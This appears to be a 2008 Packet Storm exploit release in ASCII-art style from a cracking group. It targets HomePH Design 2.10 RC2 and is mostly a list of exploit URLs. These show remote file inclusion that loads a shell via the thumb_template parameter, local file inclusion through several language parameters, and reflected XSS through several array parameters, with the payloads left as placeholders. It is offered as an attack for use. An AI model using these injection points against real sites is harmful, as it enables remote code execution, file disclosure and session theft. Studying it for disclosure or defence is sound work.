homeph-rfilfi.txt

2008-06-23T00:00:00
ID PACKETSTORM:67577
Type packetstorm
Reporter CraCkEr
Modified 2008-06-23T00:00:00

Description

                                        
                                            `┌┌───────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Remote File Include ] [ Local File Include ] [XSS] ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr : : :  
│ Group : uNiTeD CraCkiNg ForCE │ │ │  
│ Script : HomePH Design 2.10 RC2 │ │ Register Globals : │  
│ Download : SourceForge.net │ │ │  
│ Method : GET │ │ [█] ON [ ] OFF │  
│ Critical : High [░░▒▒▓▓██] │ │ │  
│ Impact : System access │ │ │  
│ ────────────────────────────────────┘ └─────────────────────────────────── │  
│ DALnet #crackers ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
  
┌┌───────────────────────────────────────────────────────────────────────────┐  
┌┘ Exploit URL's ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
  
  
[RFI]  
  
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]  
  
[LFI]  
  
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]  
http://localhost/path/admin/features/account/account.php?language=[LFI]  
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]  
http://localhost/path/admin/features/forum/forum.php?language=[LFI]  
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]  
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]  
  
[XSS]  
  
http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]  
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]  
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]  
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]  
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]  
  
Notes: More files are infected.  
═════  
  
└────────────────────────────────────────────────────────────────────────────┘  
  
Greets:  
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS  
  
┌┌───────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2008 ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
  
`